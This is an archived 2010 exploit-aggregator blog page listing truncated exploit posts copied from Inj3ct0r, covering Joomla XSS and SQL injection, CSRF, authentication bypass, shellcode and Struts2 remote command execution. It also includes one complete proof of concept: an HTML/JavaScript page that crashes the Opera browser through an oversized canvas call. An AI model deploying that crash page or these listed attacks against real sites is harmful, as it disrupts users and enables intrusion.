2010 July 14 | Information Security News and Exploits

Entries for July 14th, 2010

Joomla Health & Fitness Stats Persistent XSS Vulnerability

Jul.14, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Health & Fitness Stats Persistent XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================================
Joomla Health & Fitness Stats Persistent XSS Vulnerability
==========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Leave a Comment

Opera Denial of Service by Element

Jul.14, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Opera Denial of Service by <canvas> Element</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===========================================
Opera Denial of Service by <canvas> Element
===========================================
Opera.html
<html>
<body onload="Opera()">
<script language=JavaScript>
function Opera() {
canvas = document.getElementById("canvas");
ctx = canvas.getContext("2d");
ctx.getImageData(0,0,0×20000,0×20000);
}
</script>
<canvas id=canvas width=10 height=10></canvas>
</body>
</html>
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-12]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript [...]

Leave a Comment

Ad Network Script Persistent XSS Vulnerability

Jul.14, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Ad Network Script Persistent XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================
Ad Network Script Persistent XSS Vulnerability
==============================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Joomla Component (shop.browse) Blind SQL Injection Vulnerability

Jul.14, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component (shop.browse) Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================================
Joomla Component (shop.browse) Blind SQL Injection Vulnerability
================================================================
# Exploit Title: joomla (shop.browse) Blind SQL Injection Vulnerability
# Date: 14/7/2010
# Author:ThE DarK
# E-MaiL : Mu0@Hotmail.com
# Software Link: Not available :p
# Version: shop.browse
# Platform / [...]

Leave a Comment

Joomla Component com_easygallery Persistent XSS Vulnerability

Jul.14, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_easygallery Persistent XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===================================================
Joomla com_easygallery Persistent XSS Vulnerability
===================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

2daybiz Businesscard Script Authentication bypass

Jul.14, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>2daybiz Businesscard Script Authentication bypass</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================
2daybiz Businesscard Script Authentication bypass
=================================================
# Exploit Title: 2daybiz Businesscard Script Authentication bypass
# Date: 14th july 2010
# Author: D4rk357
#Critical:high
#contact:d4rk357[at]yahoo[dot]in
# Software Link:http://www.2daybiz.com/products/businesscard/index.php
Greetz to :b0nd, Fbih2s,rockey killer,The empty(), punter,eberly,prashant
Shoutz to : http://www.garage4hackers.com/forum.php , h4ck3r.in and [...]

Leave a Comment

Zenphoto CMS 1.3 Multiple CSRF Vulnerabilities

Jul.14, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Zenphoto CMS 1.3 Multiple CSRF Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================
Zenphoto CMS 1.3 Multiple CSRF Vulnerabilities
==============================================
<!—
Title: Zenphoto CMS 1.3 Multiple CSRF Vulnerabilities
Author: 10n1z3d <10n1z3d[at]w[dot]cn>
Date: Wed 14 Jul 2010 12:48:56 PM [...]

Leave a Comment

CMSQLite SQL Injection Vulnerability

Jul.14, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>CMSQLite SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================
CMSQLite SQL Injection Vulnerability
====================================
# Product: CMSQLite
# Vendor: CMSQLite-Team
# Vulnerable Version: 1.3 and Probably Prior Versions
# June 2010 Vulnerability Type: SQL Injection
# Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Low
# Credit: High-Tech [...]

Leave a Comment

Joomla Component com_jobs Upload Vulnerability

Jul.14, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_jobs Upload Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================
Joomla Component com_jobs Upload Vulnerability
==============================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Joomla Component com_fireboard Persistent XSS Vulnerability

Jul.14, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_fireboard Persistent XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================
Joomla com_fireboard Persistent XSS Vulnerability
=================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

linux/x86 standard system beep polymorphic shellcode 87 bytes

Jul.14, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/x86 standard system beep polymorphic shellcode 87 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=============================================================
linux/x86 standard system beep polymorphic shellcode 87 bytes
=============================================================
/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Leave a Comment

Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability

Jul.14, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>============================================================
Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability
============================================================
Apache Struts team has announced uploaded but has not released, due to an unreasonably prolonged voting process, the 2.2.0 release of the Struts2 web framework [...]

Leave a Comment

Three easy steps to remote iPhone snooping

Jul.14, 2010 in News

Mobile devices can present a serious threat to your network security because it can be surprisingly easy to hijack their data connections. With the ability to browse through a user’s mobile data traffic a hacker may easily find confidential information such as usernames and passwords that they can then use to attack your corporate network [...]

Leave a Comment

Quote

We use Linux for all our mission-critical applications. Having the source code means that we are not held hostage by anyone's support department.

Categories
- Exploits
- News

M	T	W	T	F	S	S
« Jun				Aug »
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Entries for July 14th, 2010

Joomla Health & Fitness Stats Persistent XSS Vulnerability

Opera Denial of Service by Element

Ad Network Script Persistent XSS Vulnerability

Joomla Component (shop.browse) Blind SQL Injection Vulnerability

Joomla Component com_easygallery Persistent XSS Vulnerability

2daybiz Businesscard Script Authentication bypass

Zenphoto CMS 1.3 Multiple CSRF Vulnerabilities

CMSQLite SQL Injection Vulnerability

Joomla Component com_jobs Upload Vulnerability

Joomla Component com_fireboard Persistent XSS Vulnerability

linux/x86 standard system beep polymorphic shellcode 87 bytes

Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability

Three easy steps to remote iPhone snooping

Quote

Categories

Calendar

Recent Posts